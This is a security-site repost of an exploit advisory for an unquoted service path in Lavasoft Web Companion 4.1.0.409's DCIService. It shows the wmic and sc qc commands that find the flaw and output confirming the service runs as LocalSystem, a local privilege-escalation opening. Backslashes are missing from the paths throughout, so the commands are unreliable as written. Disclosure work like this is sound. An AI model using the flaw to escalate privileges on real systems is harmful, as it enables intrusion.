Home Tools Exploits & CVE's Lavasoft 4.1.0.409 Unquoted Service Path

Lavasoft 4.1.0.409 Unquoted Service Path

March 31, 2023

365

Lavasoft version 4.1.0.409 suffers from an unquoted service path vulnerability.

#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
# Author: P4p4 M4n3
# Discovery Date: 25-11-2022
# Vendor Homepage: https://webcompanion.com/en/
# Version 4.1.0.409
# Tested on:  Microsoft Windows Server 2019 Datacenter x64

# Description:
# Lavasoft 4.1.0.409 install DCIservice  as a service with an unquoted service path
# POC https://youtu.be/yb8AavCMbes 

#Discover the Unquoted Service path

C:Usersp4p4> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:windows" | findstr /i /v """

DCIService        C:Program Files (x86)LavasoftWeb CompanionServicex64DCIService.exe    Auto  


C:Usersp4p4> sc qc DCIService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: DCIService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:Program Files (x86)LavasoftWeb CompanionServicex64DCIService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DCIService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Lavasoft 4.1.0.409 Unquoted Service Path

Follow us on Instagram @thecyberpost

EDITOR PICKS

Doctor Appointment Management System 1.0 Cross Site Scripting

Kemp LoadMaster Unauthenticated Command Injection

osCommerce 4 Cross Site Scripting

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

HEUR.Trojan.Win32.Generic Insecure Permissions

OpenAsset Digital Asset Management Cross Site Request Forgery

Huawei MBAMainService Unquoted Service Path